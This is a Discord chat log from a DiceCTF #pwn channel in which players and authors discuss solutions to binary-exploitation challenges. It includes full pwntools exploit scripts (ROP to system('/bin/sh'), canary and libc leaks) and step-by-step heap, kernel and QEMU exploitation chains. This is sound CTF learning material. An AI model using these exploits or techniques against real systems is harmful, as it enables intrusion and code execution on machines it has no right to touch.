#pwn

yea so basically you have an environment and a goal. for example, you can have many objects with "predicates" (basically properties) and you want to know if some predicate can be true. for example, every byte in memory can be an object and can have the predicate "is user controlled". you then have actions, which change the predicates of bytes. for example, if i wanted to represent a "gets()" on the heap as an action, i would mark every byte following the gets address as "is user controlled".

you feed your actions, goals, and objects into a pddl solver, and it'll spit out a series of actions to make the goal true. for example, maybe your goal is to set "is user controlled" on the bytes of __free_hook or something, and the pddl solver will figure out what series of heap allocations and frees and whatnot would make that true. it'd be cool if we had action definitions for four function heap, but as i mentioned before, at a certain level of specificity the problem is equivalent to symbolic execution. at that point, you might as well have angr try to find unconstrained states lol

Iiinteresting 🤔

Well TIL

we need house of house

Writeup for hop and boogie-woogie https://chovid99.github.io/posts/dicectf-2024-quals/

Ooo ty! 🙂

baby-talk was the first heap chal i've ever tried (and solved after a bunch of trouble). the path i took was:

• null byte poisoning to get libc/heap leak
• house of einherjar to get heap overflow
• tcache poisoning to overwrite __free_hook with system()
  and while that works i feel i massively overcomplicated it. is that a 'fair' path to take & were there simpler routes?

Thats the only solution I think

Is there a write up for baby talk?
I understand the concepts of the exploit but can't understand how they all work together, like what are the steps to achieve a shell.

I'll do one in the next days

how did 80 teams solve this

lots of good teams on this ctf

true but this sounds significantly harder than running "mov a0, 1; setpriv; flag" which has 52 solves

This challenge has a really common bug and its pretty normal in ctfs these days, its always the same exploit

but I agree that 80 is a lot

yeah I've seen einherjar come up oddly frequently in the past few months

sekai ctf had one too, although it was not the only way to solve it

Yeah but it was not as trivial to leak as this one

it's kind of like browser challenges, if you worked on this for a while it will take less effort for you to solve

except CTF community somehow worked on (toxic) heap challenges since forever

guys this time I have a heap challenge, but now it's 3x more annoying to allocate 2 items

intended solution is to wait for cosmic radiation to flip a bit in the heap metadata :)

Lol the two risc-v challs were ig scarier than the first pwn. Especially because of verilog syntax imo. Never saw it before. Also because you need to know how cpu works ig.

It being an OOO processor doesn't help

I think standard pipeline ones are easy to intuit but OOO is funky

yeh

i didn't try to read it because it looked long

Yeah I was kind of nervous about forcing people to trudge through that much verilog

I didn't end up including my testbenches for each of the modules, since that would've been 1.5x the amount of code

but i still am not sure if that was the right decision 🤔

https://itaybel.github.io/dicectf-quals-2024/

writeups for baby-talk,boogie-woogie

It took some time to understand the code, but systemverilog is surprisingly easy to read imho.

Would you release the testbenches ?

should be in the chall repo when it gets published

Heya, can somebody help me understand how the baby-talk solution works? I've tried reading both writeups posted by people here, but kept failing at the very first step, leaking the libc address.

In order to get a libc address, I understood that I have to allocate a chuck, allocate another, free the first (this way it will be inserted into a bin, and thus contain libc addresses as FD and BK. That's what I did to get the heap to look like in the pic below.
Then, by allocating the same size again i will get the same chuck, but not write anything to it, so the libc addresses stay there.

But when checking both of these addresses, they are both invalid and point to nothing. What am I missing (the pic shows the free'd first chuck)

I didn't play the challenge, but didn't some people write that the challenge used an older version of libc?

Newer libc versions have additional mitigations that prevent you from easily leaking these addresses.
Try googling "glibc safe linking".

Those looks like tcache metadata. Try to allocate and free a bigger chunk, which will go to the unsorted bin

Also you are not using the same libc version as the challenge

I've allocated 0x400.
What's the maximum for tcache?

What is the correct one, and how did ya'll figure it out?

Iirc something like 0x420

They gave us a dockerfile, which u can deploy. Then u use the docker cp command to copy the correct libc, and use patchelf to actually use it

Pastan al

ok, thx & sry for the delay, with 0x430 it worked - i see libc addresses which point to main_arena like expected.
and now my next step should be to print out the first chuck to get the leak and find system...

And then I utilize the null byte overflow in order to make the program consolidate a second chuck to my first "free" chuck - in which i'll be writing the address of __malloc_hook or __free_hook in place of the FD or BK pointer in the "free" chuck? Am I in the right direction?

Yes something like that

basically, just go to shellphishes how2heap and either press the play button on for null byte poisoning or House of Einherjar, that'll take you to an online interactive debugger where you can go through every step of the exploit, it works almost exactly like pwndbg, so just break main and step through from there

Hi, I don’t see testbench files in the repo 😢
Are they in the compressed rar file?
https://github.com/dicegang/dicectf-quals-2024-challenges/tree/main/pwn/cooorcpu/rtl

oh strolled

@earnest temple

I didn't end up uploading them to the challenge repo

I can send them tomorrow if you're interested

Thanks 🙏

@earnest temple finally done:
https://surg.dev/dice24q/

Which version of libc does baby-talk use?

I can't find libc file😭

It used Ubuntu GLIBC 2.27-3ubuntu1.6.

(idk if attaching it is appropriate. just remove it, if it isnt)

Nice! Cool solution

Thank u so much🥳

In baby-talk, why did we only need to specify the fwd and bk pointers in the first 0x10 bytes of our fake chunk, and not the proceeding fd_nextsize and bk_nextsize fields? (ref: https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_einherjar.c#L51)

baby-talk writeups ive seen do provide a fd_nextsize/bk_nextsize forging

if its omitted, it could just be that glibc doesnt care

Yeah I just saw that when i didnt use it in my exploit it wasnt required, so maybe it is not checked for, I have to check the source code of glibc

edit: It seems that the fd_nextsize and bk_nextsize pointers might only be used in the largebins

@analog cave can i also win an all-expenses paid flag to this challenge

!flag

dice{2025}

!flag

locked-room full armor

lol

dang it still hasnt been blooded yet

surely my chal wont go unsolved again this year right

right??

lock room

?

yeah

someone said he already close

o

amazing

wait thats a kasumi pfp

holy based

if everything is right

we will close

🙏

@coral heart you made locked_room?

yea

So far its a great challenge, spent like 3h on it, found a vuln but I am still a noob at pwn, cant finish the challenge haha

Need to learn a bit

The vuln was very subtle haha

good luck, it only gets harder from there :^)

Yeah I know 😭

Thats why I am doing r2uwu now

A little easier haha

thanks google cloud for $300

our exploit for a challenge required too many interactions and we were always getting timed out

🥺

my blood is losing

Test locally?

huh

amazing

not me

......

lmao

u got scammed

well these pwn ones are breaking my mind

ggs

You're not in this alone brother

Ty

nice that #announcements says to open ticket, but the challenge is not an option 😄

@covert compass ^

we forgor to update the list

💀

errrr

For now, open a ticket using something else @iron mauve

just added bassoon

should work now

can confirm

https://tenor.com/view/confused-white-persian-guardian-why-gif-10312546

me tryin to bypass some of those checks

lmao

have fun 🙂

very cool chall nonetheless thank you !!

btw if u find sth to improve/enhance/fix in pwndbg, pls add issues! (https://github.com/pwndbg/pwndbg/issues) ;D

💀💀💀

i guess you should work on locked room instead since it has solves :^))))

I'm dyng to know the intended for locked room

That chall is crazy

Will you release authors writeups after the ctf ends?

probably not full writeups (unless some authors want to) but we should have at least sources + solvers/explanations

yeah we'll have a solve script

any bassooners? 🥺

worked on it for a while but i don't think it's happening in the next thirty minutes 😵‍💫 not a professional bassooner

im flag hoarding it remind me to submit before the ctf ends 👍

https://tenor.com/view/horse-horse-riding-horse-racing-bet-betting-gif-3055828060879938449

https://tenor.com/view/horse-horse-riding-horse-racing-bet-betting-gif-3055828060879938449

https://tenor.com/view/please7tv-please-beg-pray-hope-gif-3860103425950934673

https://tenor.com/view/absolute-cinema-gif-16944752780895267751

cinema assoluto

btw i REALLY hope it's not just about finding a valid struct

https://tenor.com/view/horse-horse-riding-horse-racing-bet-betting-gif-3055828060879938449

https://tenor.com/view/bounce-thank-you-thank-you-bounce-gif-1481304924914151554

writeup for locked room?

https://tenor.com/view/supakuntgif-gorilla-slide-gif-26379182

@spare zodiac drop the solve

https://tenor.com/view/monkey-arrive-gorilla-arrived-gif-26371781

plz solve for locked_goon

was the trick for locked_room finding the right fake chunk ?

wdym fake chunk

there's no right fake tcache chunk 👀

max_address check kills u as well

fake chunk as in fake-fast-chunk

if that's what u ask about

managed to corrupt tcache's next ptr but couldnt do anything without leaks, and didnt find a way to read back bpls

you can overwrite the main_arena->top to a glibc address

that's interesting

how do u do that if &main_arena lies in glibc itself?

largebin attack

i've played with largebins too

how's that possible ?

Bro i fuzzed like shit and got everything except an arb write

for locked room, idk if intended is different, this is just when i test solved: usetwo largebin attacks, one to overwrite global_max_fast and another misaligned one to forge a chunk header above main_arena.top, uses the extended fastbins to leak stack from a mangled list pointer and overwrite system_mem with heap pointer, then tsu to overwrite top with a libc address and allocate on the fake chunk to write a stack address to top, then find valid chunk header in stack and rop

i got killed by the tcache size check

but i could only write ptr to arbitrary address to heap where i controlled data

I got this solve script from a message bottle sent by Golden Witch Beatrice.

uu-uu

yeah this is pretty much intended

I managed to corrupt main_arena->system_mem doing largebin attack but I couldn't corrupt top with libc address💀

Golden Truth: Craft a fake fastbin chain on the heap, overwrite the global_max_fast to a huge value with large bin attack, so main_arena->top will be considered as a fastbin entry.

Do a large bin attack again to overwrite the lower bytes of top pointer to make it point backwards to the fake fastbin chain.

OK BUT WHERE BASSOON SOLVE?????

give me a sec

thanks HAHAHAHAHA

damn what a nice chall, i went on a completely different (and erroneous) path

any writeup for resort?

Up

btw @spare zodiac i'm starting to think that you some kind of special relationship with the pipe_buffer struct 😄

wait did anyone make significant progress on bassoon, if someone is still working on it and wants to solve i don't want to spoil

i actually meant to disable this but forgor, intended is to do it with the socket address structures themselves cuz you get a uaf with overflow into refcount

but i knew there was probably a million other ways too so no big deal

managed to corrupt tcache's next ptr but couldnt do anything without leaks, and didnt find a way to read back bpls

could someone drop the solve for debugapwner?

ane didnt really try to look for a struct to corrupt

Resort solve please

once i overflowed into page* i shamelessly used a writeup of your LA CTF kernel chall

So libc partial relro was just for the meme

In italy we say porcamadonna

ye i mean, kinda the same paths as messanger from lactf...

oopsie

why the kernel pwns always have to be heap bofs 😭

oob to partial overwrite puts@got to popen (requires only 4 bit brute, as the functions are on the same page), then tweak the global strings to make popen work

isnt pipe buffer in the cg cache? cross cache??

||spoiler tags exist ayo||

there were no cg

what??

damn didn't spot that :P

the COFIG_something was disabled

how did you overwrite next ptr?

thats so dumb

did anyone notice the sed in the linux.dockerfile

yes

I was kinda shocked when i checked for gadgets in 22.04 and they were right next to each other 😁

we were able to control the stack/retaddr

Thank them for CONFIG_SLAB_MERGE_DEFAULT=y

0x100 tchace chunks were contigous, so i used three of them to
chunk 1 corrupts chunk2 size to clobber chunk3
free chunk2 to consolidate size
free chunk3
alloc chunk2, now you writing on chunk3 metadata

what chal?

oboe

it disables stack canary and bug that allows you to overflow socket getname

which is intended solution

You used 3 chunks of same size?

let me post my solve for that way, even though pipe_buffer is exponentially easier

Brooo please someone send the resort one for the love of god

ah lol, saw heap bof and went for pipes corruption

r2uwu2s-resort:

from ctypes import CDLL
from pwn import context, flat, p64, remote, sys, u64


rand = CDLL('libc.so.6').rand

context.binary = 'resort'
glibc = context.binary.libc


def get_process():
    if len(sys.argv) == 1:
        return context.binary.process()

    host, port = sys.argv[1], sys.argv[2]
    return remote(host, port)


def write_uint8_at(offset, value):
    to_send = []
    current = 0

    while True:
        to_send.append(str(offset + 1).encode())

        if rand() % 4 == 3:
            break
        else:
            rand() % 256

    while current != value:
        to_send.append(str(offset + 1).encode())

        if rand() % 4 == 3:
            current = 0
        else:
            dmg = rand() % 255
            current = (256 + current - dmg) % 256

    io.sendlineafter(b'> ', b'\n'.join(to_send))


io = get_process()

io.recvuntil(b'r2uwu2 @ ')
context.binary.address = int(io.recvuntil(b' ', drop=True).decode(), 16) - context.binary.sym.print_ui

io.success(f'ELF address: {hex(context.binary.address)}')

# 0x000000000000179b: pop rdi; pop rbp; ret;
pop_rdi_pop_rbp_ret_addr = context.binary.address + 0x179b

# 0x000000000000101a: ret;
ret_addr = context.binary.address + 0x101a

rop_chain = flat([
    pop_rdi_pop_rbp_ret_addr,
    context.binary.got.printf,
    0,
    context.binary.plt.puts,
    ret_addr,
    context.binary.sym.main
])

ret_offset = 0x6c

for i, c in enumerate(rop_chain):
    write_uint8_at(ret_offset + i, c)

for i in range(3):
    write_uint8_at(i, 0)

io.recvuntil(b'r2uwu2 wins!\n')
glibc.address = u64(io.recvline().strip().ljust(8, b'\0')) - glibc.sym.printf
io.success(f'Glibc address: {hex(glibc.address)}')

rop_chain = flat([
    pop_rdi_pop_rbp_ret_addr,
    next(glibc.search(b'/bin/sh')),
    0,
    glibc.sym.system
])

for i, c in enumerate(rop_chain):
    write_uint8_at(ret_offset + i, c)

for i in range(3):
    write_uint8_at(i, 0)

io.recvuntil(b'r2uwu2 wins!\n')
io.interactive()

fact that CONFIG_SLAB_FREELIST_RANDOM was disabled helped a lot also

Ty

ok but

whee bassoon solve

what was debugapwner TwT

12 bit brute force did not cook

^

can get around it with a bit of luck I thought

ENZO HOW DO I LEAK SOME GODDAMN ADDRESSES

cooked for me

ending it all

i gave up on popen

fr fr

📣 😂

all will be revealed in due time

that also must have been the case for corjail

unfortunate

Bro trying to understand what the actual fuck you did there, fsropped into rop into fake everything what is going on

I am curious about the intended on r2uwu2s-resort. I don't think I did it on the intended way because I didn't used any leak.

that was sneaky, haven't noticed actually

I didn't know about popen
I had to brute force 12 bits for system to work

yeah i thought possibly i should have added a pow to make people find it 😭 its no big deal though, just a neat trick

enzo, we had a troubled relationship, with ups and downs, but it can all be forgotten if you tell how the fuck i can get leaks

https://tenor.com/view/horse-horse-riding-horse-racing-bet-betting-gif-3055828060879938449

lol, sorry dice servers 🫡

we were questioning why they are talking about pipe_buffer is in kmalloc and not in cg

yeah spray and pray

ENZO I SWEAR WE WILL FORGET THE VSYSCALL INCIDENT

I overwrote rbp with bss address and set r13 and r12 to 0
Then one gadget

vsyscall incident?

???

also any idea why meltdown doesnt work

How?

trxctf

we just needed a leak honestly

what do you mean

^

the writeup was talking about everything in the gfp_kernel cache

including pipe_buffer

wait was rand() just predictable???

Yeah
It didn't use srand

Yes, rand with no seed

POV: I did not realize u could leak heap and libc in locked-room and tried my best to do everything leaklessly

But I dont understand the need to predict rand, cant we just wait for the one thing we want?

Because there is a timeout on remote

oh god

There is hp which ends after a 100 tries

POV: leaked libc, heap, managed to overwrite tcache/fastbin/unsorted fd and bk and still did not flag 😢

Also where dis you input the gadgets? There was nowhere you could input it right? Only for choice

Same

I managed to reset mine haha

oh yeah i was concerned about that at first but then as i wrote the exploit it just didn't come into play for some reason?

And has infinite

the craziest thing is I'm sure it is doable, i just ran out of time and allocs

I thought it was stored in r12

I jumped into lockbox too late so couldn't finish my solve, but yeah its basically almost same as intended

My idea was to somehow overwrite arena_ptr->max_address and then comfortably tcache poison since i had a double free going somehow

Basically, since the return address is a libc address and the offset to the one-gadget is known, I simply overwrote the last 3 bytes to use the one-gadget.

yeah even I think its doable but yeah too much of a time investment '_'

i was stressing each time i ran a for loop to do some allocations on locked 😄

On resort the whole time I thought it was the OOB that wasnt checked for choice, wasn it that it?

Never managed to get a chunk into the arena though,

yeah i was using ur leakless smallbin->tcache stashing idea from one of ur writeups

Yeah it is

I did almost the same

ahh lol makes sense

No, because uint8 can't be negative

Sorry I am very noob at this, I dont undertand where did you input the gadgets?

actual footage of enzocut edging me and making me going crazy and begging for bassoon leaks
https://www.facebook.com/idoladuomo/videos/enzo-cut️idolasaloon-napoli-roma-firenze-milanowhatsapp3341826714-info-081292338/541011863742051/?locale=it_IT

i had the tcache_perthread_struct linked in tcache, global_max_fast overwritten, av->system_mem overwritten, was about to manage to get the av top in libc, all with a reasonable 8bit heap +4bit libc brute

intended was to use the leak to rop twice, but since you can overwrite half of a return address you technically didn't need to use the leak at all
but also r2uwu2s-resort was supposed to be the easy pwn soooo

#free leaks for all

#i'm not like enzo

Will you post a writeUp?

#free leaks for all

Lmao I didnt even manage to get the easy pwn

i have a solve script but no writeup

a big mess written at 5 am 🥰

r2uwu2s-resort intended solve script (badly written ngl)

The return address is in libc
So I waited for the right random value then decremented it from each byte so that it points to a one gadget

Pure ctf fire 🔥

Wait you decremented so that the return address matched a gadget WOW

All I thought I could do was set it to 0 with the DOM item

that brute was neat tbh last time, but since I did not start any soon I did not even think of doing leakless, just went for filling up tcache, getting overlapping chunks by coalescing 3 unsorted bin chunks placing coalesced chunk in tcache and leaking through that

You could actually subtract to form a valid gadget 😭😭

i did not even question that this chal was maybe not leakless like im so fucking stupid

I am so dumb I didnt think subtracting would get a valid gadget

lol I did not look at the run binary in one of enzocuts challenge which setup a linked list chain and felt so stupid cause of that, almost solved without it thinking its supposed to be solved that way

that run just added enough env vars, it would work with anything >5 so locally for most people without run, just not in redjail, and idk why i golfed the run binary was just being unnecessarily toxic

oh no wonder T_T

I saw binary was golfed and I was like, prolly not important

i dont even run stuff directly on my host anymore, i always just reproduce the setup in docker whenever possible

I've been traumatized enough in the past by dumb env shit lol

https://tenor.com/view/smiley-face-smile-joy-want-spit-gif-9797795817090409654

enzo do you have something for me 👉 👈

do you want bassoon solve

ye...

YES

ok

WHY YOU EDGING ME

THANKS

intended solve for pwn/bassoon, i might do a full writeup later but this has all the important ideas:

first part is getting consistent heap corruption primitives using the fact that all 7 0x100 tcache entries are almost always contiguous. from here you can get overlapping chunks and prepare a UAF write. next part is figuring out what structure to actually target. we don't have partial overwrite which forces us to target something that gets allocated after our corruption, and prevents us from dealing with things containing absolute addresses. most important things are allocated in the main heap, and the thread heap is mostly used by TCG.

there may be multiple approaches, but my solution is to overwrite entries in the TCG fast path CPUTLBEntry table, which basically implements the TLB for guest virtual to host virtual address translation. it gets reallocd on the thread heap in tlb_mmu_resize_locked which gets triggered either periodically from tlb_flush_by_mmuidx_async_work which we can't control very well, or on a single page flush if the page is a large (huge) page. we can thus flush a huge page with invlpg to trigger resizing. the new size is based on a rate calculated within a 100 ms window, so we want to busy loop at cpl0 after the first flush to get a low rate and downsize the table.

there are tables for each mmu_idx type, which is an arch-based classifier. for x64, there are 3 main ones: usermode, kernel mode, and kernel mode running/accessing usermode code/memory implying no SMAP/SMEP. you could simplify the exploitation by doing it all through one mmu_idx so you don't need to context switch to trigger TLB activity between invlpg'ing, but i just did it with the usermode TLB anyway and had a kernel module that let me call my own userspace functions at cpl0. the noise taming part is very difficult, since TCG is constantly allocating chunks of 0x28 to insert nodes into qtree during TCG translation within tb_gen_code (called for each basic block). we get around this by stuffing all of our important operations for triggering heap activity like the intel HDA writes and invlpgs into single basic blocks at a time.

we get overlapping chunks and free a size 0x810 for the fast TLB to reclaim when it downsizes to minimum size of 0x40 (0x20 size per entry). each entry in the table has 3 virtual addresses and one addend. the virtual addresses correspond to the guest virtual addresses translations for read, write, and code accesses, and the addend gets added to the virtual address to calculate the host address. we can't control the addend usefully without leaks, but we can overwrite the virtual address, and the difference between our overwritten one and the old one effectively gets added to the addend during translation. this is how we are able to get reliable memory corruption leaklessly, and i think it's a pretty cool and novel technique.

the host address a virtual address maps to is dependent on the physical address, so we can get a reliable location in the mapping space by having our vaddr tied to a fixed physical address like 0. the thread heap arena is consistently 0x7e00000 bytes behind the host mapping for physical address 0. 0x7e0 & 0x3f is also 0 so this will be placed at index 0 in the table making it easy to overflow into. so we first map 0x7e00000 to 0, and now overflow the virtual addresses to 0, and when we deref 0 it will hit the TLB and translate as (intended host address - 0x7e00000) + 0 which we have established is just the thread heap arena.

so now we have arb read/write into the first page of the arena which contains things like tcache bins and various pointers to other regions. i leaked the rwx region and main heap, then overwrote two tcache entries to first write shellcode to the rwx region and then overwrite a function pointer in the main heap with a pointer to the shellcode.

all of the past qemu exploits i've seen for real vulns usually try to get some explicit leak primitive either from a separate vuln or some random device, but i think it's cool that it's theoretically possible in a stable enough environment to do this sort of leakless technique. it does rely on TCG though, maybe i'll try this challenge again but with KVM and see if it's still possible.

BRO WHAT

Yeah ggs

nice chall

very interesting but pretty crazy for 24h

not that 48 would have changed anything but i think its a good idea to release the hardest challenges first

there were 40h to solve it, but yeah sorry for the late release

i am sleep deprived and my cognition of time has been permanently ruined 🙏

gg enzocut, that looks absolutely crazy, could you pls tell step by step what you did? just to understand better the explaination

roma nord eboy going crazy in the chat

roma nord eboy absolutely obliterated by the qemu pwn

bruh i spent something like 20h on this chall, thought i just needed a random and simple struct to corrupt or that i was just skill issueing a way to read my chunk, turns out i was miles away from the flag and that the chall is fucking cursed

https://tenor.com/view/picklejuicelover69-gif-2151952551172175484

• i got edged for the solve

^ Pictured the new york arena for the finals

it might be time for florida man horse not going to lie

my beloved fentmaster abello was too busy on those web chals to encourage me with some florida man horse

wish I could've been there for you king

I was too busy supplying abello with the stash

I CAN CONFIRM

For debugapwner: there is an out of bounds write on flag with the opcode 0x51, so we can overwrite correct_msg with /bin/sh + the binary is partial RELRO => partial overwrite of the GOT entry of puts with the address of system (works once in 4096 attempts).
Moreover flag is indexed by an int and read_uleb128 reads a ulong, thus it is possible to write at negative indexes.

for debugapwner, like the good human being that I am, I politely asked clubby in ticket if 12 bit bruteforce is too much. seeing as the response was that it's too much I proceeded to look for a less random solution for many hours. after much pain I found that I could overwrite puts with gets (1/16) and then some unresolved functions in the binary (I used elf_end and fprintf another 1/16) to trigger some got chaining. this let me leak libc with puts call by overwriting chars in correct_string until we hit stderr, then call gets on correct_string to write pointer to libc got into stderr, and finally use elf_end to jump to main which called fprintf with stderr in rdi. this let me call gets with controlled rdi anywhere in libc so I just did setcontext. ended in a 1/256 brute so not as optimal as intended, but much more reasonable

kernel mode running usermode code through SMAP.
could you explain how that works? i think i ve seen this a few times already but never seen a full explanation on this

You are too much human (:

Nice, I couldn't see how to do better than 12-bit bf

edited to fix wording sry. SMAP/SMEP prevents userspace memory/code from being accessed/executed by the kernel. qemu uses a different mmu_idx when translating userspace memory at cpl0, implying that SMAP/SMEP are disabled

We just did 12-bit bruteforce without thinking twice. xd

And had like 4 ppl running ten instances of the sploit each. xd

Took just a few minutes.

About an hour for me with 3-4 instances of my script above on my machine

Maybe a bit less, I don't remember

Someone had a server in US, which was running much faster than from Europe.

Ah yes, it was so slow for us Europeans 😦

Europe is a 3rd world country.

One of my teammates also had trouble on r2uwu2s due to the slowness of the connections

You can rent a cloud server for just a few cents though.

Who rents a server for a ctf chall?

many ppl

so many

It's on the cursed ctf tactics iceberg iirc 👀

uhm

gg

icebergs are meant to be explored!

Yes, I'm just kidding 😄

You can actually do it with 1/16 chance because you control both arguments to puts() (via the contents of incorrect_flag and correct_flag, respectively)
Using that, you can change puts() to popen("cat /flag.txt", "w"), and popen() is very close to puts(), so you are only missing 4 unknown bits

My solution for locked-room was quite different, I didn't "disable" the range checks (no overwriting of system_mem etc), and didn't leak stack (just libc and heap). I built a write primitive around smallbin->tcache stashing using these two writes:
(a) bck->fd = bin (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3937)
(b) writing next in tcache_put (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3939)

Let's create a chain of k fake smallbin chunks. The bk of the last chunk points to some target location victim.

(a) enables us to write smallbin pointer to arbitrary location - for this we use k=8. The stashing returns the first chunk and moves the next 7 chunks into tcache. The write happens when the final chunk is stashed.

(b) enables us to write mangled pointers (partially controlled by us) - for this we use k=7. In this case, our victim pointer becomes the final stashed chunk. To avoid crash, [victim+0x18] (bk) must be a writable pointer, we can get around that by first writing smallbin pointer there using (a). Then tcache_put writes mangled pointer to previous chunk to victim+0x10 (next). It also clobbers bunch of stuff, but who cares. Now note that we can setup this previous chunk anywhere on the heap. In particular, we can obtain arbitrary lowest byte in the mangled pointer. Thus we can write arbitrary data to arbitrary location byte by byte.

This method is quite alloc-intensive, to reduce the allocations I linked tcache_perthread_struct into tcache, and setup all chains in a batch (so some steps could be done using single tcache_perthread_struct write for all ops).

To get shell, I overwrote tunable_get_val plt entry in libc. It is called by ptmalloc_init during malloc initialization. To call it again, I just clear malloc_initialized flag. Unfortunately, there was no compatible onegadget, so I did some pivoting (ret to stack buffer with user input which pivots to ROP chain on heap). I ended up using 92/100 allocations.

wack

cool to see multiple solutions though

that arent just cheese lol

Oooh well spotted, I forgot about the second argument

from @karmic crag
https://xia0.sh/blog/rokkenjima/last-note-of-the-golden-witch

This is my solve for locked room.

1. Get a double free on fastbin by freeing a fastbin next to top chunk, then allocating from top chunk to clear PREV_FAST_FREED
2. Use this to allocate on tcache_perthread_struct
3. largebin attack on main_arena->system_mem
4. largebin attack on smallbin[0xa0].bk to create a viable top chunk size within main_arena
5. tcache stash to leak stack
6. tcache stash to overwrite av->top
7. put fake size in fastbin array, then allocate on main_arena to overwrite main_arena->top to point to stack
8. ROP

did anyone get the docker env working for debugging debugapwner? i didn't solve but going back to it now and can't get it working

What's the problem? You can launch the Docker with docker run -p 5000:5000 --privileged $(docker build -q .)

If you want to debug, I'd probably remove the pwn.red/jail part, and install socat + gdbserver in the Docker to allow you to attach before it runs

Alternatively use pwninit to get the libc linked on host

running it was fine it was attaching the debugger that was the issue

ill try swapping it to socat

ty

i did try pwninit but it didn't manage to patch the aditional deps and couldn't get it working manually with patchelf

is just me being dumb ;P

Oh yeah I remember running into that - socat + gdbserver is probably the most painless then

1

why so complex

just do sudo -E gdb --ex 'attachp dwarf' ./dwarf

u can add in --retry to attachp to automagically retry until the process pops up

and u then do ur standard pwntools remote script with HOST=localhost PORT=5000

and u have 1:1 env

(note: that's on the latest dev branch of pwndbg, need to cut off another release :p)

(otherwise the attachp ... may find gdb process for its partial matching :x)

Interesting 👀

I use gef currently but good to know

this requires having pwndbg on the docker right? unless im misunderstanding what you mean.

p = remote('0.0.0.0', 5000)
p.recv(1)

pid = run("pgrep dwarf", shell=True, capture_output=True).stdout.decode().strip()
pid = int(pid)

context.terminal = ...

script = """
c
"""
g = gdb.attach(pid, exe="dwarf_patch", gdbscript=script, sysroot=f"/proc/{pid}/root/", api=True)

this is what I did and it worked great

the only quirk with this challenge was that the python script read the initial input and launched the binary, so it was tricky to get the actual dwarf process to hang. I ended up patching the first two pushes in main to be an infinite loop. and then in gdbscript can just set $rip=$rip+2 and it works great

No. Pwndbg on the host.

U can attach to a process that is in docker from the host

would this method allow you to continue sending gdb commands from the script?

sounds like the script doesn't do any attaching and is just responsible for sending payload, interacting with remote, etc.

Not sure what do you mean? attachp works more or less the same way as the python script you posted.

Ah, you mean to use pwntools gdb api feature. Then I think attachp won't work and you have to do exactly what you did. IIrc there was an issue on pwntools repo that proposed adding support for starting process in docker and attaching to them, but no one ever got around doing that.

Although, you don't have to run pgrep manually, as iirc gdb.attach just accepts process name as argument.

Yes, for example in this challenge I wanted to use the api to correctly set my bruteforced nibbles midway through the exploit to avoid disabling aslr in the docker or something like that

Oh ok I'll have to check

I think pgrep is just more forgiving and won't require the exact name/command and makes setting sysroot easier

Yup, pwntools api wont work with attachp

But u can have a script in py that would do some stuff too, tho, pwntools scripting may be better, idk

We need to finally stabilize and announce/document pwndbg python apis 🙂

Wow

any writeup for oboe?

that's the official solution if you want #pwn message

hai guys

can you help me download the propper libc6 for the pwn challenges

All files required to solve are included

https://tenor.com/view/pablo-escobar-pablo-stan-twt-standing-grandpa-gif-15901735077073339091

me when i can't find the vuln in garden

i crashed my vm trying to exploit the garden chall

💀

https://tenor.com/view/happy-dog-happy-excited-dog-excited-so-excited-gif-18315667279243423061

me after finding vuln in garden chall

how to garden 😔

grow a beanstalk

@unreal adder favorite plant?

in a garden, 汉菜 is delicious

the leaves of amaranthus tricolore, stir fried with garlic

or is it Amaranthus dubius

red spinach

THIS IS SO GOOD

then you put the liquid on rice and the rice becomes red too

😋

omg you know about this??

what do you call it

i haven't heard anyone call it by this name outside of wuhan

i lowk don't know I just recognized the picture lmao

just red spinach

how long is the pow supposed to take? 💀

I don't remember having a pow on pwn/garden

its taking like 4 minutes just to do pow

💀

for which challenge?

oh wait garden does in fact have a pow

yea it does

the pow difficulty is 30000, it shouldn't take more than a minute

maybe try reconnecting?

yea that worked

@unreal adder
good chall !

thanks :)

now time to pwn the CoRnel

💀

or do some other category

or go to sleep

true

im so disappointed there isn't a heap chall :((

garden kinda counts tbh

how is that heap tho

how is it not

its just not ptmalloc

and even then ptmalloc is like slightly involved

tbf it's yet another userland chall.
it has no heap stuff :((
only like custom heap, stack and garbage collection

one heap chall per day keeps the doctor away

it has no heap stuff but only a custom heap?

🥴

also heap note is boring as fuck

im glad they didnt make a filler challenge like that

i mean you can't even call the custom heap ... heap

it's just kinda like a stack or something yk

idk .. it's just not heap

:((

heap note might be.
but dicectf has a good history with heap challs. locked room from last year was goated. still upsolving it btw.

but it is
nothing says that heap impls need linked lists etc as bins or something

yea ur right

so sad that people just slopped the chall :((

Cornel💩

@strange pecan
will there be a wu for cornel?
(love ur posts btw)

Cornel is going to end me gng

Did u solve?

well i didn't take a look.

im pretty sure i can't solve it :((

will read wu

Same I have done like 2 challs in the pwncollege kernel sec module

oh they are really easy i think.

kernel exploitation last two challenges are hard tho

kernel security is really easy

Ye they're easy af

they are not even kernel one might say

probably nah, cant be feeding data to slop lol

what about for us? 🥹

hmm there is a main strat im willing to talk about for the challenge

which from that point you can solve in a million ways lol

fizzbuzz why u dont share writeup in zip file

like if someone has made good progress u give him zip to see where he missed

it's literally exploiting a heap

yea it is

it's more of a vm chall

not really a chall focused on heap feng shui

i think there is a definitely feng shui involved :)

glibc heap is just one super specifically well-studied implementation of memory management

good chall. that's all i can say really.

solver for garden

solve for kernel?

so how do you solve cornelslop?
(I found double frees but could not trigger them without crashing, apparently due to RCU refusing to call destructors until a context switch on all cores or something)

Suprised cornelslop had so few solves, we just slopped it ...
https://chatgpt.com/share/69ad6f55-4de0-800d-b2c8-a432e2202b0d

garden solve

solver for bytecrusher:

#!/usr/bin/env python3
from pwn import *

exe  = context.binary = ELF(args.EXE or './bytecrusher')
libc = ELF(exe.libc.path) if exe.libc else None

io = remote('bytecrusher.chals.dicec.tf', 1337)

canary = 0
for i in range(7):
  io.sendlineafter(b':', b'A'*8)
  io.sendlineafter(b':', str(0x49+i).encode())
  io.sendlineafter(b':', b'3')

  io.recvuntil(b'string:\nA')
  canary |= u8(io.recv(1)) << (i*8)
  io.recvuntil(b':')

canary = canary<<8

libc_leak = 0
for i in range(6):
  io.sendlineafter(b':', b'A'*8)
  io.sendlineafter(b':', str(0x68+i).encode())
  io.sendlineafter(b':', b'3')

  io.recvuntil(b'string:\nA')
  libc_leak |= u8(io.recv(1)) << (i*8)
  io.recvuntil(b':')

libc.address = libc_leak - 0x2a1ca

for i in range(3):
  io.sendlineafter(b':', b'A'*8)
